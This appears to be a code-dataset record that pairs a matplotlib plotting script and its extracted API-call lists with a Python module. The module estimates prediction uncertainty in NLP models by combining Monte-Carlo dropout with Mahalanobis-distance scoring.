phis3_uncorr = pd.Series(phis3_uncorr)
phis4_uncorr = pd.Series(phis4_uncorr)
phis5_uncorr = pd.Series(phis5_uncorr)
phis6_uncorr = pd.Series(phis6_uncorr)
fig, ax = plt.subplots(2, 3, figsize=(10, 5), sharex='col', sharey='row')
plt.ylim(0, 1000)
fig.suptitle('Distribution of phase difference, correlated vs uncorrelated')
ax[1, 0].set_xlabel('Phase Difference $\phi$')
ax[1, 1].set_xlabel('Phase Difference $\phi$')
ax[1, 2].set_xlabel('Phase Difference $\phi$')
ax[0, 0].set_ylabel(f'$\phi$ (t={Dtime})')
ax[1, 0].set_ylabel(f'$\phi$ (t={Dtime})')
ax[0, 0].set_ylim(0, 1000)
ax[1, 0].set_ylim(0, 1000)
text_plot1 = f'$\sigma_1$={sigma_uncorr[0][0]}, $\sigma_2$={sigma_uncorr[0][1]} and $\sigma_3$={sigma_corr[0][2]}.'
ax[0, 0].hist(phis1_corr, bins=np.linspace(0, 1, 22), alpha=0.5, edgecolor='k', color=c[2], rwidth=0.9, label='correlated')
ax[0, 0].hist(phis1_uncorr, bins=np.linspace(0, 1, 22), alpha=0.5, edgecolor='k', color=c[-3], rwidth=0.9, label='uncorrelated')
ax[0, 0].legend(loc='upper right', prop={'size': 8})
ax[0, 0].set_title(text_plot1, size=10)
text_plot2 = f'$\sigma_1$={sigma_uncorr[1][0]}, $\sigma_2$={sigma_uncorr[1][1]} and $\sigma_3$={sigma_corr[1][2]}.'
ax[0, 1].hist(phis2_corr, bins=np.linspace(0, 1, 22), alpha=0.5, edgecolor='k', color=c[2], rwidth=0.9, label='correlated')
ax[0, 1].hist(phis2_uncorr, bins=np.linspace(0, 1, 22), alpha=0.5, edgecolor='k', color=c[-3], rwidth=0.9, label='uncorrelated')
ax[0, 1].legend(loc='upper right', prop={'size': 8})
ax[0, 1].set_title(text_plot2, size=10)
text_plot3 = f'$\sigma_1$={sigma_uncorr[2][0]}, $\sigma_2$={sigma_uncorr[2][1]} and $\sigma_3$={sigma_corr[2][2]}.'
ax[0, 2].hist(phis3_corr, bins=np.linspace(0, 1, 22), alpha=0.5, edgecolor='k', color=c[2], rwidth=0.9, label='correlated')
ax[0, 2].hist(phis3_uncorr, bins=np.linspace(0, 1, 22), alpha=0.5, edgecolor='k', color=c[-3], rwidth=0.9, label='uncorrelated')
ax[0, 2].legend(loc='upper right', prop={'size': 8})
ax[0, 2].set_title(text_plot3, size=10)
text_plot4 = f'$\sigma_1$={sigma_uncorr[3][0]}, $\sigma_2$={sigma_uncorr[3][1]} and $\sigma_3$={sigma_corr[3][2]}.'
ax[1, 0].hist(phis4_corr, bins=np.linspace(0, 1, 22), alpha=0.5, edgecolor='k', color=c[2], rwidth=0.9, label='correlated')
ax[1, 0].hist(phis4_uncorr, bins=np.linspace(0, 1, 22), alpha=0.5, edgecolor='k', color=c[-3], rwidth=0.9, label='uncorrelated')
ax[1, 0].legend(loc='upper right', prop={'size': 8})
ax[1, 0].set_title(text_plot4, size=10)
text_plot5 = f'$\sigma_1$={sigma_uncorr[4][0]}, $\sigma_2$={sigma_uncorr[4][1]} and $\sigma_3$={sigma_corr[4][2]}.'
ax[1, 1].hist(phis5_corr, bins=np.linspace(0, 1, 22), alpha=0.5, edgecolor='k', color=c[2], rwidth=0.9, label='correlated')
ax[1, 1].hist(phis5_uncorr, bins=np.linspace(0, 1, 22), alpha=0.5, edgecolor='k', color=c[-3], rwidth=0.9, label='uncorrelated')
ax[1, 1].legend(loc='upper right', prop={'size': 8})
ax[1, 1].set_title(text_plot5, size=10)
text_plot6 = f'$\sigma_1$={sigma_uncorr[5][0]}, $\sigma_2$={sigma_uncorr[5][1]} and $\sigma_3$={sigma_corr[5][2]}.'
ax[1, 2].hist(phis6_corr, bins=np.linspace(0, 1, 22), alpha=0.5, edgecolor='k', color=c[2], rwidth=0.9, label='correlated')
ax[1, 2].hist(phis6_uncorr, bins=np.linspace(0, 1, 22), alpha=0.5, edgecolor='k', color=c[-3], rwidth=0.9, label='uncorrelated')
ax[1, 2].legend(loc='upper right', prop={'size': 8})
ax[1, 2].set_title(text_plot6, size=10)
plt.tight_layout()
#plt.savefig('un_vs_correlated.svg')
plt.show()
|
[
"numpy.random.seed",
"matplotlib.pyplot.show",
"math.sqrt",
"matplotlib.pyplot.ylim",
"numpy.random.randn",
"matplotlib.pyplot.subplots",
"numpy.array",
"pandas.Series",
"numpy.linspace",
"matplotlib.pyplot.tight_layout"
] |
[((436, 452), 'numpy.random.seed', 'np.random.seed', ([], {}), '()\n', (450, 452), True, 'import numpy as np\n'), ((4708, 4729), 'pandas.Series', 'pd.Series', (['phis1_corr'], {}), '(phis1_corr)\n', (4717, 4729), True, 'import pandas as pd\n'), ((4743, 4764), 'pandas.Series', 'pd.Series', (['phis2_corr'], {}), '(phis2_corr)\n', (4752, 4764), True, 'import pandas as pd\n'), ((4778, 4799), 'pandas.Series', 'pd.Series', (['phis3_corr'], {}), '(phis3_corr)\n', (4787, 4799), True, 'import pandas as pd\n'), ((4813, 4834), 'pandas.Series', 'pd.Series', (['phis4_corr'], {}), '(phis4_corr)\n', (4822, 4834), True, 'import pandas as pd\n'), ((4848, 4869), 'pandas.Series', 'pd.Series', (['phis5_corr'], {}), '(phis5_corr)\n', (4857, 4869), True, 'import pandas as pd\n'), ((4883, 4904), 'pandas.Series', 'pd.Series', (['phis6_corr'], {}), '(phis6_corr)\n', (4892, 4904), True, 'import pandas as pd\n'), ((5619, 5642), 'pandas.Series', 'pd.Series', (['phis1_uncorr'], {}), '(phis1_uncorr)\n', (5628, 5642), True, 'import pandas as pd\n'), ((5658, 5681), 'pandas.Series', 'pd.Series', (['phis2_uncorr'], {}), '(phis2_uncorr)\n', (5667, 5681), True, 'import pandas as pd\n'), ((5697, 5720), 'pandas.Series', 'pd.Series', (['phis3_uncorr'], {}), '(phis3_uncorr)\n', (5706, 5720), True, 'import pandas as pd\n'), ((5736, 5759), 'pandas.Series', 'pd.Series', (['phis4_uncorr'], {}), '(phis4_uncorr)\n', (5745, 5759), True, 'import pandas as pd\n'), ((5775, 5798), 'pandas.Series', 'pd.Series', (['phis5_uncorr'], {}), '(phis5_uncorr)\n', (5784, 5798), True, 'import pandas as pd\n'), ((5814, 5837), 'pandas.Series', 'pd.Series', (['phis6_uncorr'], {}), '(phis6_uncorr)\n', (5823, 5837), True, 'import pandas as pd\n'), ((5849, 5912), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(2)', '(3)'], {'figsize': '(10, 5)', 'sharex': '"""col"""', 'sharey': '"""row"""'}), "(2, 3, figsize=(10, 5), sharex='col', sharey='row')\n", (5861, 5912), True, 'import matplotlib.pyplot as plt\n'), ((5913, 5930), 'matplotlib.pyplot.ylim', 'plt.ylim', (['(0)', '(1000)'], {}), '(0, 1000)\n', (5921, 5930), True, 'import matplotlib.pyplot as plt\n'), ((9070, 9088), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (9086, 9088), True, 'import matplotlib.pyplot as plt\n'), ((9126, 9136), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (9134, 9136), True, 'import matplotlib.pyplot as plt\n'), ((685, 702), 'numpy.random.randn', 'np.random.randn', ([], {}), '()\n', (700, 702), True, 'import numpy as np\n'), ((730, 747), 'numpy.random.randn', 'np.random.randn', ([], {}), '()\n', (745, 747), True, 'import numpy as np\n'), ((775, 792), 'numpy.random.randn', 'np.random.randn', ([], {}), '()\n', (790, 792), True, 'import numpy as np\n'), ((3921, 3935), 'numpy.array', 'np.array', (['phis'], {}), '(phis)\n', (3929, 3935), True, 'import numpy as np\n'), ((6439, 6460), 'numpy.linspace', 'np.linspace', (['(0)', '(1)', '(22)'], {}), '(0, 1, 22)\n', (6450, 6460), True, 'import numpy as np\n'), ((6565, 6586), 'numpy.linspace', 'np.linspace', (['(0)', '(1)', '(22)'], {}), '(0, 1, 22)\n', (6576, 6586), True, 'import numpy as np\n'), ((6902, 6923), 'numpy.linspace', 'np.linspace', (['(0)', '(1)', '(22)'], {}), '(0, 1, 22)\n', (6913, 6923), True, 'import numpy as np\n'), ((7028, 7049), 'numpy.linspace', 'np.linspace', (['(0)', '(1)', '(22)'], {}), '(0, 1, 22)\n', (7039, 7049), True, 'import numpy as np\n'), ((7365, 7386), 'numpy.linspace', 'np.linspace', (['(0)', '(1)', '(22)'], {}), '(0, 1, 22)\n', (7376, 7386), True, 'import numpy as np\n'), 
((7491, 7512), 'numpy.linspace', 'np.linspace', (['(0)', '(1)', '(22)'], {}), '(0, 1, 22)\n', (7502, 7512), True, 'import numpy as np\n'), ((7828, 7849), 'numpy.linspace', 'np.linspace', (['(0)', '(1)', '(22)'], {}), '(0, 1, 22)\n', (7839, 7849), True, 'import numpy as np\n'), ((7954, 7975), 'numpy.linspace', 'np.linspace', (['(0)', '(1)', '(22)'], {}), '(0, 1, 22)\n', (7965, 7975), True, 'import numpy as np\n'), ((8291, 8312), 'numpy.linspace', 'np.linspace', (['(0)', '(1)', '(22)'], {}), '(0, 1, 22)\n', (8302, 8312), True, 'import numpy as np\n'), ((8417, 8438), 'numpy.linspace', 'np.linspace', (['(0)', '(1)', '(22)'], {}), '(0, 1, 22)\n', (8428, 8438), True, 'import numpy as np\n'), ((8754, 8775), 'numpy.linspace', 'np.linspace', (['(0)', '(1)', '(22)'], {}), '(0, 1, 22)\n', (8765, 8775), True, 'import numpy as np\n'), ((8880, 8901), 'numpy.linspace', 'np.linspace', (['(0)', '(1)', '(22)'], {}), '(0, 1, 22)\n', (8891, 8901), True, 'import numpy as np\n'), ((671, 684), 'math.sqrt', 'math.sqrt', (['dt'], {}), '(dt)\n', (680, 684), True, 'import math as math\n'), ((716, 729), 'math.sqrt', 'math.sqrt', (['dt'], {}), '(dt)\n', (725, 729), True, 'import math as math\n'), ((761, 774), 'math.sqrt', 'math.sqrt', (['dt'], {}), '(dt)\n', (770, 774), True, 'import math as math\n')]
|
import torch
from ue4nlp.dropconnect_mc import (
LinearDropConnectMC,
activate_mc_dropconnect,
convert_to_mc_dropconnect,
hide_dropout,
)
from ue4nlp.dropout_mc import DropoutMC, activate_mc_dropout, convert_to_mc_dropout
from utils.utils_dropout import set_last_dropout, get_last_dropout, set_last_dropconnect
from utils.utils_heads import (
ElectraClassificationHeadIdentityPooler,
BertClassificationHeadIdentityPooler,
ElectraNERHeadIdentityPooler,
XLNetClassificationHeadIdentityPooler,
)
from utils.utils_inference import (
is_custom_head,
unpad_features,
pad_scores
)
from ue4nlp.mahalanobis_distance import (
mahalanobis_distance,
mahalanobis_distance_relative,
mahalanobis_distance_marginal,
compute_centroids,
compute_covariance
)
import numpy as np
import copy
from tqdm import tqdm
import time
import logging
log = logging.getLogger()
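# Swap the model's dropout layers for Monte-Carlo counterparts: DropoutMC for standard MC
# dropout or LinearDropConnectMC for DropConnect, applied either to the last dropout only or
# to all dropout/linear layers, depending on ue_args.dropout_subs and ue_args.dropout_type.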
def convert_dropouts(model, ue_args):
if ue_args.dropout_type == "MC":
dropout_ctor = lambda p, activate: DropoutMC(
p=ue_args.inference_prob, activate=False
)
elif ue_args.dropout_type == "DC_MC":
dropout_ctor = lambda linear, activate: LinearDropConnectMC(
linear=linear, p_dropconnect=ue_args.inference_prob, activate=activate
)
else:
raise ValueError(f"Wrong dropout type: {ue_args.dropout_type}")
if (ue_args.dropout_subs == "all") and (ue_args.dropout_type == "DC_MC"):
convert_to_mc_dropconnect(
model.electra.encoder, {"Linear": dropout_ctor}
) # TODO: check encoder or all dropouts ?
hide_dropout(model.electra.encoder)
elif (ue_args.dropout_subs == "last") and (ue_args.dropout_type == "DC_MC"):
set_last_dropconnect(model, dropout_ctor)
hide_dropout(model.classifier)
elif ue_args.dropout_subs == "last":
set_last_dropout(model, dropout_ctor(p=ue_args.inference_prob, activate=False))
elif ue_args.dropout_subs == "all":
convert_to_mc_dropout(model, {"Dropout": dropout_ctor})
else:
raise ValueError(f"Wrong ue args {ue_args.dropout_subs}")
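# MSD uncertainty estimator for sequence classification: it combines MC-dropout sampled
# probabilities with a class-conditional Mahalanobis distance fitted on training features,
# and mixes the two signals into a single uncertainty score via the config.mixup coefficients.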
class UeEstimatorMSD:
def __init__(
self, cls, config, ue_args, eval_metric, calibration_dataset, train_dataset
):
self.cls = cls
self.ue_args = ue_args
self.calibration_dataset = calibration_dataset
self.eval_metric = eval_metric
self.train_dataset = train_dataset
self.config = config
def fit_ue(self, X, y=None, X_test=None):
cls = self.cls
model = self.cls._auto_model
log.info("****************Start fitting covariance and centroids **************")
if y is None:
y = self._exctract_labels(X)
self._replace_model_head()
X_features = self._exctract_features(X)
self.class_cond_centroids = self._fit_centroids(X_features, y)
self.class_cond_covarince = self._fit_covariance(X_features, y)
self._restore_model_head()
log.info("**************Done.**********************")
def _fit_covariance(self, X, y, class_cond=True):
if class_cond:
return compute_covariance(self.class_cond_centroids, X, y, class_cond)
return compute_covariance(self.train_centroid, X, y, class_cond)
def _fit_centroids(self, X, y, class_cond=True):
return compute_centroids(X, y, class_cond)
def _replace_model_head(self):
cls = self.cls
model = self.cls._auto_model
self.old_classifier = copy.deepcopy(model.classifier)
use_paper_version = self.ue_args.get("use_paper_version", False)
use_activation = not use_paper_version
if is_custom_head(model):
model.classifier = ElectraClassificationHeadIdentityPooler(model.classifier, use_activation)
elif "xlnet" in self.config.model.model_name_or_path:
            # XLNet has no separate classifier head, so we replace sequence_summary and logits_proj instead
self.cls.model.logits_proj = XLNetClassificationHeadIdentityPooler()
else:
model.classifier = BertClassificationHeadIdentityPooler(model.classifier)
def _restore_model_head(self):
model = self.cls._auto_model
model.classifier = self.old_classifier
def _exctract_labels(self, X):
return np.asarray([example["label"] for example in X])
def _exctract_features(self, X):
cls = self.cls
model = self.cls._auto_model
try:
X = X.remove_columns("label")
except:
X.dataset = X.dataset.remove_columns("label")
X_features = cls.predict(X, apply_softmax=False, return_preds=False)[0]
return X_features
def _calc_distinctivness_score(self, full_mahalanobis_distance, eval_labels, eval_results):
start_unc = time.time()
min_mahalanobis_distance = np.min(full_mahalanobis_distance, axis=-1)
# calc penalty
penalty = self.config.mixup.margin * np.where(
eval_labels == np.argmin(full_mahalanobis_distance, axis=-1), 0, 1
)
dist_score = np.log10(
self.config.mixup.beta1 * penalty
+ self.config.mixup.beta2 * min_mahalanobis_distance
)
# after calc uncertainty score
max_probs = np.max(
np.mean(np.asarray(eval_results["sampled_probabilities"]), axis=0), axis=-1
)
uncertainty_score = (
self.config.mixup.gamma1 / max_probs + self.config.mixup.gamma2 * dist_score
)
end_unc = time.time()
eval_results["uncertainty_score"] = uncertainty_score.tolist()
return eval_results, end_unc - start_unc
def _predict_with_fitted_cov(self, X, y, eval_results):
cls = self.cls
model = self.cls._auto_model
self._replace_model_head()
log.info("****************Compute MD with fitted covariance and centroids **************")
start = time.time()
if y is None:
y = self._exctract_labels(X)
X_features = self._exctract_features(X)
end = time.time()
md, inf_time = mahalanobis_distance(None, None, X_features,
self.class_cond_centroids, self.class_cond_covarince, True)
sum_inf_time = inf_time + (end - start)
eval_results["mahalanobis_distance"] = md.tolist()
self._restore_model_head()
log.info("**************Done.**********************")
return eval_results, md, sum_inf_time
def _activate_dropouts(self, model):
ue_args = self.ue_args
log.info("******Perform stochastic inference...*******")
if ue_args.dropout_type == "DC_MC":
activate_mc_dropconnect(model, activate=True, random=ue_args.inference_prob)
else:
convert_dropouts(model, ue_args)
activate_mc_dropout(model, activate=True, random=ue_args.inference_prob)
if ue_args.use_cache:
log.info("Caching enabled.")
model.enable_cache()
return model
def _deactivate_dropouts(self, model):
activate_mc_dropout(model, activate=False)
activate_mc_dropconnect(model, activate=False)
return model
def _predict_mc(self, X, y):
ue_args = self.ue_args
eval_metric = self.eval_metric
model = self.cls._auto_model
start = time.time()
model = self._activate_dropouts(model)
eval_results = {}
eval_results["sampled_probabilities"] = []
eval_results["sampled_answers"] = []
log.info("****************Start runs**************")
for i in tqdm(range(ue_args.committee_size)):
preds, probs = self.cls.predict(X)[:2]
eval_results["sampled_probabilities"].append(probs.tolist())
eval_results["sampled_answers"].append(preds.tolist())
if ue_args.eval_passes:
eval_score = eval_metric.compute(
                    predictions=preds, references=y
)
log.info(f"Eval score: {eval_score}")
end = time.time()
log.info("**************Done.********************")
model = self._deactivate_dropouts(model)
return eval_results, end - start
def _predict_msd(self, X, y):
ue_args = self.ue_args
model = self.cls._auto_model
if y is None:
y = self._exctract_labels(X)
eval_results, mc_time = self._predict_mc(X, y)
eval_results, full_mahalanobis_distance, md_time = self._predict_with_fitted_cov(X, y, eval_results)
eval_results["eval_labels"] = y
        # eval_results now holds the sampled probabilities and the Mahalanobis distances;
        # combine them below into the distinctiveness score and the final uncertainty score
eval_results, unc_time = self._calc_distinctivness_score(full_mahalanobis_distance, y, eval_results)
sum_inf_time = mc_time + md_time + unc_time
eval_results["ue_time"] = sum_inf_time
log.info(f"UE time: {sum_inf_time}")
return eval_results
def __call__(self, X, y):
return self._predict_msd(X, y)
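# Token-level (NER) variant of the estimator above: labels and features are flattened over
# tokens before fitting centroids and covariance, and the per-token distances are reshaped
# back to the original (batch, sequence-length) layout when computing the distinctiveness score.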
class UeEstimatorMSDNer:
def __init__(
self, cls, config, ue_args, eval_metric, calibration_dataset, train_dataset
):
self.cls = cls
self.ue_args = ue_args
self.calibration_dataset = calibration_dataset
self.eval_metric = eval_metric
self.train_dataset = train_dataset
self.config = config
def fit_ue(self, X, y=None, X_test=None):
cls = self.cls
model = self.cls._auto_model
log.info("****************Start fitting covariance and centroids **************")
if y is None:
y, y_shape = self._exctract_labels(X)
self._replace_model_head()
X_features = self._exctract_features(X)
self.class_cond_centroids = self._fit_centroids(X_features, y)
self.class_cond_covarince = self._fit_covariance(X_features, y)
self._restore_model_head()
log.info("**************Done.**********************")
def _fit_covariance(self, X, y, class_cond=True):
if class_cond:
return compute_covariance(self.class_cond_centroids, X, y, class_cond)
return compute_covariance(self.train_centroid, X, y, class_cond)
def _fit_centroids(self, X, y, class_cond=True):
return compute_centroids(X, y, class_cond)
def _replace_model_head(self):
cls = self.cls
model = self.cls._auto_model
self.old_classifier = copy.deepcopy(model.classifier)
use_paper_version = self.ue_args.get("use_paper_version", False)
use_activation = not use_paper_version
if is_custom_head(model):
model.classifier = ElectraNERHeadIdentityPooler(model.classifier, use_activation)
else:
model.classifier = BertClassificationHeadIdentityPooler(model.classifier)
def _restore_model_head(self):
model = self.cls._auto_model
model.classifier = self.old_classifier
def _exctract_labels(self, X):
y = np.asarray([example["labels"] for example in X])
y_shape = y.shape
return y.reshape(-1), y_shape
def _exctract_features(self, X):
cls = self.cls
model = self.cls._auto_model
try:
X = X.remove_columns("labels")
except:
X.dataset = X.dataset.remove_columns("labels")
X_features = cls.predict(X, apply_softmax=False, return_preds=False)[0]
X_features = X_features.reshape(-1, X_features.shape[-1])
return X_features
def _calc_distinctivness_score(self, full_mahalanobis_distance, eval_labels, eval_shape, eval_results):
start_unc = time.time()
min_mahalanobis_distance = np.min(full_mahalanobis_distance, axis=-1).reshape(
eval_shape
)
# calc penalty
penalty = self.config.mixup.margin * np.where(
eval_labels
== np.argmin(full_mahalanobis_distance, axis=-1).reshape(eval_shape),
0,
1,
)
dist_score = np.log10(
self.config.mixup.beta1 * penalty
+ self.config.mixup.beta2 * min_mahalanobis_distance
)
# after calc uncertainty score
max_probs = np.max(
np.mean(np.asarray(eval_results["sampled_probabilities"]), axis=0), axis=-1
)
uncertainty_score = (
self.config.mixup.gamma1 / max_probs + self.config.mixup.gamma2 * dist_score
)
end_unc = time.time()
eval_results["uncertainty_score"] = uncertainty_score.tolist()
return eval_results, end_unc - start_unc
def _predict_with_fitted_cov(self, X, y, eval_results):
cls = self.cls
model = self.cls._auto_model
self._replace_model_head()
log.info("****************Compute MD with fitted covariance and centroids **************")
start = time.time()
y_pad, y_shape = self._exctract_labels(X)
X_features = self._exctract_features(X)
end = time.time()
md, inf_time = mahalanobis_distance(None, None, X_features,
self.class_cond_centroids, self.class_cond_covarince, True)
sum_inf_time = inf_time + (end - start)
eval_results["mahalanobis_distance"] = md.tolist()
self._restore_model_head()
log.info("**************Done.**********************")
return eval_results, md, sum_inf_time
def _activate_dropouts(self, model):
ue_args = self.ue_args
log.info("******Perform stochastic inference...*******")
if ue_args.dropout_type == "DC_MC":
activate_mc_dropconnect(model, activate=True, random=ue_args.inference_prob)
else:
convert_dropouts(model, ue_args)
activate_mc_dropout(model, activate=True, random=ue_args.inference_prob)
if ue_args.use_cache:
log.info("Caching enabled.")
model.enable_cache()
return model
def _deactivate_dropouts(self, model):
activate_mc_dropout(model, activate=False)
activate_mc_dropconnect(model, activate=False)
return model
def _predict_mc(self, X, y):
ue_args = self.ue_args
eval_metric = self.eval_metric
model = self.cls._auto_model
start = time.time()
model = self._activate_dropouts(model)
eval_results = {}
eval_results["sampled_probabilities"] = []
eval_results["sampled_answers"] = []
log.info("****************Start runs**************")
for i in tqdm(range(ue_args.committee_size)):
preds, probs = self.cls.predict(X)[:2]
eval_results["sampled_probabilities"].append(probs.tolist())
eval_results["sampled_answers"].append(preds.tolist())
if ue_args.eval_passes:
eval_score = eval_metric.compute(
                    predictions=preds, references=y
)
log.info(f"Eval score: {eval_score}")
end = time.time()
log.info("**************Done.********************")
model = self._deactivate_dropouts(model)
return eval_results, end - start
def _predict_msd(self, X, y):
ue_args = self.ue_args
model = self.cls._auto_model
y_pad, y_shape = self._exctract_labels(X)
eval_results, mc_time = self._predict_mc(X, y)
eval_results, full_mahalanobis_distance, md_time = self._predict_with_fitted_cov(X, y, eval_results)
eval_results["eval_labels"] = y
        # eval_results now holds the sampled probabilities and the Mahalanobis distances;
        # combine them below into the distinctiveness score and the final uncertainty score
eval_results, unc_time = self._calc_distinctivness_score(full_mahalanobis_distance, y_pad, y_shape, eval_results)
sum_inf_time = mc_time + md_time + unc_time
eval_results["ue_time"] = sum_inf_time
log.info(f"UE time: {sum_inf_time}")
return eval_results
def __call__(self, X, y):
return self._predict_msd(X, y)
|
[
"ue4nlp.dropconnect_mc.activate_mc_dropconnect",
"numpy.argmin",
"ue4nlp.mahalanobis_distance.compute_covariance",
"ue4nlp.mahalanobis_distance.compute_centroids",
"utils.utils_heads.BertClassificationHeadIdentityPooler",
"utils.utils_inference.is_custom_head",
"ue4nlp.dropconnect_mc.convert_to_mc_dropconnect",
"numpy.log10",
"ue4nlp.dropconnect_mc.LinearDropConnectMC",
"ue4nlp.dropout_mc.activate_mc_dropout",
"copy.deepcopy",
"utils.utils_heads.XLNetClassificationHeadIdentityPooler",
"numpy.asarray",
"numpy.min",
"ue4nlp.dropout_mc.convert_to_mc_dropout",
"utils.utils_heads.ElectraClassificationHeadIdentityPooler",
"utils.utils_dropout.set_last_dropconnect",
"ue4nlp.dropout_mc.DropoutMC",
"utils.utils_heads.ElectraNERHeadIdentityPooler",
"ue4nlp.dropconnect_mc.hide_dropout",
"time.time",
"ue4nlp.mahalanobis_distance.mahalanobis_distance",
"logging.getLogger"
] |
[((893, 912), 'logging.getLogger', 'logging.getLogger', ([], {}), '()\n', (910, 912), False, 'import logging\n'), ((1482, 1556), 'ue4nlp.dropconnect_mc.convert_to_mc_dropconnect', 'convert_to_mc_dropconnect', (['model.electra.encoder', "{'Linear': dropout_ctor}"], {}), "(model.electra.encoder, {'Linear': dropout_ctor})\n", (1507, 1556), False, 'from ue4nlp.dropconnect_mc import LinearDropConnectMC, activate_mc_dropconnect, convert_to_mc_dropconnect, hide_dropout\n'), ((1628, 1663), 'ue4nlp.dropconnect_mc.hide_dropout', 'hide_dropout', (['model.electra.encoder'], {}), '(model.electra.encoder)\n', (1640, 1663), False, 'from ue4nlp.dropconnect_mc import LinearDropConnectMC, activate_mc_dropconnect, convert_to_mc_dropconnect, hide_dropout\n'), ((3316, 3373), 'ue4nlp.mahalanobis_distance.compute_covariance', 'compute_covariance', (['self.train_centroid', 'X', 'y', 'class_cond'], {}), '(self.train_centroid, X, y, class_cond)\n', (3334, 3373), False, 'from ue4nlp.mahalanobis_distance import mahalanobis_distance, mahalanobis_distance_relative, mahalanobis_distance_marginal, compute_centroids, compute_covariance\n'), ((3451, 3486), 'ue4nlp.mahalanobis_distance.compute_centroids', 'compute_centroids', (['X', 'y', 'class_cond'], {}), '(X, y, class_cond)\n', (3468, 3486), False, 'from ue4nlp.mahalanobis_distance import mahalanobis_distance, mahalanobis_distance_relative, mahalanobis_distance_marginal, compute_centroids, compute_covariance\n'), ((3620, 3651), 'copy.deepcopy', 'copy.deepcopy', (['model.classifier'], {}), '(model.classifier)\n', (3633, 3651), False, 'import copy\n'), ((3792, 3813), 'utils.utils_inference.is_custom_head', 'is_custom_head', (['model'], {}), '(model)\n', (3806, 3813), False, 'from utils.utils_inference import is_custom_head, unpad_features, pad_scores\n'), ((4424, 4471), 'numpy.asarray', 'np.asarray', (["[example['label'] for example in X]"], {}), "([example['label'] for example in X])\n", (4434, 4471), True, 'import numpy as np\n'), ((4948, 4959), 'time.time', 'time.time', ([], {}), '()\n', (4957, 4959), False, 'import time\n'), ((4995, 5037), 'numpy.min', 'np.min', (['full_mahalanobis_distance'], {'axis': '(-1)'}), '(full_mahalanobis_distance, axis=-1)\n', (5001, 5037), True, 'import numpy as np\n'), ((5226, 5326), 'numpy.log10', 'np.log10', (['(self.config.mixup.beta1 * penalty + self.config.mixup.beta2 *\n min_mahalanobis_distance)'], {}), '(self.config.mixup.beta1 * penalty + self.config.mixup.beta2 *\n min_mahalanobis_distance)\n', (5234, 5326), True, 'import numpy as np\n'), ((5669, 5680), 'time.time', 'time.time', ([], {}), '()\n', (5678, 5680), False, 'import time\n'), ((6082, 6093), 'time.time', 'time.time', ([], {}), '()\n', (6091, 6093), False, 'import time\n'), ((6219, 6230), 'time.time', 'time.time', ([], {}), '()\n', (6228, 6230), False, 'import time\n'), ((6263, 6371), 'ue4nlp.mahalanobis_distance.mahalanobis_distance', 'mahalanobis_distance', (['None', 'None', 'X_features', 'self.class_cond_centroids', 'self.class_cond_covarince', '(True)'], {}), '(None, None, X_features, self.class_cond_centroids,\n self.class_cond_covarince, True)\n', (6283, 6371), False, 'from ue4nlp.mahalanobis_distance import mahalanobis_distance, mahalanobis_distance_relative, mahalanobis_distance_marginal, compute_centroids, compute_covariance\n'), ((7258, 7300), 'ue4nlp.dropout_mc.activate_mc_dropout', 'activate_mc_dropout', (['model'], {'activate': '(False)'}), '(model, activate=False)\n', (7277, 7300), False, 'from ue4nlp.dropout_mc import DropoutMC, activate_mc_dropout, 
convert_to_mc_dropout\n'), ((7309, 7355), 'ue4nlp.dropconnect_mc.activate_mc_dropconnect', 'activate_mc_dropconnect', (['model'], {'activate': '(False)'}), '(model, activate=False)\n', (7332, 7355), False, 'from ue4nlp.dropconnect_mc import LinearDropConnectMC, activate_mc_dropconnect, convert_to_mc_dropconnect, hide_dropout\n'), ((7535, 7546), 'time.time', 'time.time', ([], {}), '()\n', (7544, 7546), False, 'import time\n'), ((8261, 8272), 'time.time', 'time.time', ([], {}), '()\n', (8270, 8272), False, 'import time\n'), ((10462, 10519), 'ue4nlp.mahalanobis_distance.compute_covariance', 'compute_covariance', (['self.train_centroid', 'X', 'y', 'class_cond'], {}), '(self.train_centroid, X, y, class_cond)\n', (10480, 10519), False, 'from ue4nlp.mahalanobis_distance import mahalanobis_distance, mahalanobis_distance_relative, mahalanobis_distance_marginal, compute_centroids, compute_covariance\n'), ((10597, 10632), 'ue4nlp.mahalanobis_distance.compute_centroids', 'compute_centroids', (['X', 'y', 'class_cond'], {}), '(X, y, class_cond)\n', (10614, 10632), False, 'from ue4nlp.mahalanobis_distance import mahalanobis_distance, mahalanobis_distance_relative, mahalanobis_distance_marginal, compute_centroids, compute_covariance\n'), ((10766, 10797), 'copy.deepcopy', 'copy.deepcopy', (['model.classifier'], {}), '(model.classifier)\n', (10779, 10797), False, 'import copy\n'), ((10938, 10959), 'utils.utils_inference.is_custom_head', 'is_custom_head', (['model'], {}), '(model)\n', (10952, 10959), False, 'from utils.utils_inference import is_custom_head, unpad_features, pad_scores\n'), ((11327, 11375), 'numpy.asarray', 'np.asarray', (["[example['labels'] for example in X]"], {}), "([example['labels'] for example in X])\n", (11337, 11375), True, 'import numpy as np\n'), ((12014, 12025), 'time.time', 'time.time', ([], {}), '()\n', (12023, 12025), False, 'import time\n'), ((12391, 12491), 'numpy.log10', 'np.log10', (['(self.config.mixup.beta1 * penalty + self.config.mixup.beta2 *\n min_mahalanobis_distance)'], {}), '(self.config.mixup.beta1 * penalty + self.config.mixup.beta2 *\n min_mahalanobis_distance)\n', (12399, 12491), True, 'import numpy as np\n'), ((12834, 12845), 'time.time', 'time.time', ([], {}), '()\n', (12843, 12845), False, 'import time\n'), ((13247, 13258), 'time.time', 'time.time', ([], {}), '()\n', (13256, 13258), False, 'import time\n'), ((13381, 13392), 'time.time', 'time.time', ([], {}), '()\n', (13390, 13392), False, 'import time\n'), ((13425, 13533), 'ue4nlp.mahalanobis_distance.mahalanobis_distance', 'mahalanobis_distance', (['None', 'None', 'X_features', 'self.class_cond_centroids', 'self.class_cond_covarince', '(True)'], {}), '(None, None, X_features, self.class_cond_centroids,\n self.class_cond_covarince, True)\n', (13445, 13533), False, 'from ue4nlp.mahalanobis_distance import mahalanobis_distance, mahalanobis_distance_relative, mahalanobis_distance_marginal, compute_centroids, compute_covariance\n'), ((14421, 14463), 'ue4nlp.dropout_mc.activate_mc_dropout', 'activate_mc_dropout', (['model'], {'activate': '(False)'}), '(model, activate=False)\n', (14440, 14463), False, 'from ue4nlp.dropout_mc import DropoutMC, activate_mc_dropout, convert_to_mc_dropout\n'), ((14472, 14518), 'ue4nlp.dropconnect_mc.activate_mc_dropconnect', 'activate_mc_dropconnect', 